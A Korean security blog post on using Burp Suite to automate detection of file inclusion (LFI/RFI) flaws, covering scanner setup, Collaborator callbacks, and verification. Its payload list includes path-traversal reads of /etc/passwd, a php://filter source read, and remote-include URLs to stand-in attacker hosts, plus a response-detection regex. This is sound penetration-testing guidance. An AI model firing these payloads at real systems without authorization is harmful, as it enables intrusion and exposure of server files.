오아시스스토리 블로그
Burp Suite · 2026-05-01

Burp로 파일 인클루전(LFI/RFI) 탐지 자동화

Burp Suite를 활용해 로컬 및 원격 파일 인클루전(LFI/RFI)을 체계적으로 탐지하고 자동화하는 워크플로우, 스캐너 설정과 확장 활용 설명

작성일 : 2026-05-01 ㆍ 작성자 : 관리자
post
목차

서론

파일 인클루전(File Inclusion)은 웹 애플리케이션에서 흔히 발생하는 취약점이다. 로컬 파일 인클루전(LFI)과 원격 파일 인클루전(RFI)은 서로 다른 위험을 동반한다. LFI는 서버 내부 파일 접근을 허용하고, RFI는 외부 페이로드 실행으로 이어질 수 있다. 이 글은 Burp Suite를 중심으로 LFI/RFI 탐지를 자동화하는 실무적 절차를 알기 쉽게 정리한다. 초보자도 따라오기 쉽도록 단계별로 구성했다.

파일 인클루전 기본 개념

LFI와 RFI 차이

LFI는 애플리케이션이 로컬 파일 경로를 잘못 처리해 파일 내용을 노출하거나 내부 코드를 실행할 때 발생한다. RFI는 외부 URL을 포함해 원격 파일을 불러오며, 공격자가 제어하는 스크립트가 서버에서 실행될 위험이 있다. 탐지 관점에서는 입력값에 파일 경로나 URL을 주입해 응답 변화를 관찰하는 것이 핵심이다.

탐지에서 보는 대표적 징후

  • 서버 에러 메시지(경로, 파일명, 파서 오류 등)
  • 파일 내용 일부가 노출되는 경우(예: /etc/passwd 일부)
  • 원격 페이로드가 실행되어 생성되는 외부 요청

Burp를 이용한 탐지 전략 개요

자동화는 수동 확인과 결합되어야 효과적이다. 기본 흐름은 다음과 같다.

  • 프록시로 요청 수집
  • 취약 가능 파라미터 추출
  • 스캔 정책 설정 및 패턴 추가
  • 활성 스캔 또는 Intruder로 페이로드 주입
  • 스캔 결과 검증 및 false positive 제거

Burp 설정과 워크플로우

1) 프록시로 트래픽 캡처

브라우저를 Burp 프록시로 연결해 전체 요청을 수집한다. 로그인 세션이 필요한 경우 세션을 유지한 상태에서 탐색하여 민감한 파라미터를 기록한다. 이렇게 모은 요청은 스캔 대상으로 바로 연결된다.

2) 파라미터 식별과 분류

매개변수 중 파일 경로나 URL을 받을 가능성이 높은 항목을 우선 선정한다. 예를 들어 include, file, path, page, template 같은 이름이 붙은 파라미터는 우선 순위가 높다.

3) 스캐너 정책 구성

Burp의 스캐너에서 검사 강도와 페이로드 세트를 조정한다. RFI 검사를 위해서는 외부 콜백을 확인할 수 있는 Burp Collaborator를 사용한다. LFI는 로컬 파일 읽기 페이로드와 null byte, 상대경로(../) 시도 등이 필요하다.

페이로드와 감지 규칙 예시

아래는 자주 쓰는 페이로드 샘플이다. 자동화 과정에서 이 목록을 확장하면 탐지율을 높일 수 있다.

../etc/passwd
../../../../etc/passwd
../../../../../../etc/passwd%00
php://filter/convert.base64-encode/resource=index.php
http://example.attacker.com/payload.txt
https://attacker.example/payload.php

응답에서의 감지 규칙은 단순 문자열 매칭과 정규표현식을 병행한다. 예를 들어 /etc/passwd 서브스트링, PHP 에러 스택, base64로 인코딩된 파일 조각 등이다.

정규식 예시:
/etc/passwd|root:.*:0:0|PHP Parse error|include\(.*\): failed

Burp 확장과 자동화 도구 활용

Burp Extensions

BApp Store의 확장을 활용하면 탐지 자동화를 확장할 수 있다. 추천 확장:

  • Logger++: 트래픽 분석과 필터링
  • ActiveScan++: 사용자 정의 페이로드와 플러그인 지원
  • Collaborator Client: 외부 콜백 검증

스캔 자동화 팁

  • 스캔 정책에 LFI/RFI 관련 페이로드를 추가한다.
  • Collaborator 도메인을 사용해 RFI 콜백을 수집한다.
  • 스캔 전후로 baseline(정상 응답)을 비교해 노이즈를 줄인다.
  • Intruder를 이용해 파라미터별 조합 공격을 수행한다.

실전 검증 절차

자동 스캔에서 의심 항목이 감지되면 다음 순서로 검증한다.

  • 문제의 요청을 Repeater로 복사
  • 단계별 페이로드 주입으로 응답 변화를 관찰
  • 에러 메시지나 파일 내용 노출 여부 확인
  • RFI 의심 시 Collaborator에서 콜백 로그 확인

사례별 주의사항

LFI의 경우 null byte 인코딩이나 URL 인코딩 처리가 필요할 수 있다. RFI는 방화벽과 WAF 우회 시도가 불법에 해당할 수 있으므로 허가된 범위 내에서만 진행해야 한다. 자동화는 범위를 넓힐 수 있지만, 윤리적·법적 한계를 준수하는 것이 최우선이다.

결론 및 체크리스트

Burp Suite로 LFI/RFI를 자동화하려면 수집, 분류, 페이로드 구성, 스캐너 정책 조정, 확장 활용, 수동 검증의 순서로 접근하는 것이 효율적이다. 최종 검증은 수동으로 수행해 false positive를 제거한다. 아래 체크리스트를 참조하면 실무 적용이 용이하다.

  • 프록시로 모든 트래픽 캡처 여부 확인
  • 취약 가능 파라미터 우선순위 설정
  • 스캐너에 LFI/RFI 페이로드 추가
  • Collaborator로 외부 콜백 감시
  • Replayer/Repeater로 의심 항목 재검증

이 절차를 따르면 Burp LFI 탐지와 RFI 검사 Burp 기반 작업을 체계적으로 수행할 수 있다. 자동화는 반복 작업을 줄여주지만, 최종 판단은 사람이 직접 검증하는 것을 권장한다.

Burp LFI 탐지 RFI 검사 Burp Burp 파일 인클루전 스캔 Burp Suite 자동화 LFI 탐지 RFI 탐지 웹 취약점 스캐닝 Burp Extensions